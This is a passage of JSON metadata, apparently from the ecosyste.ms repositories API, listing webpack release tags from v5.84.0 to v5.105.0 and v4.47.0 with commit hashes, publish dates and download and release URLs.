cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_a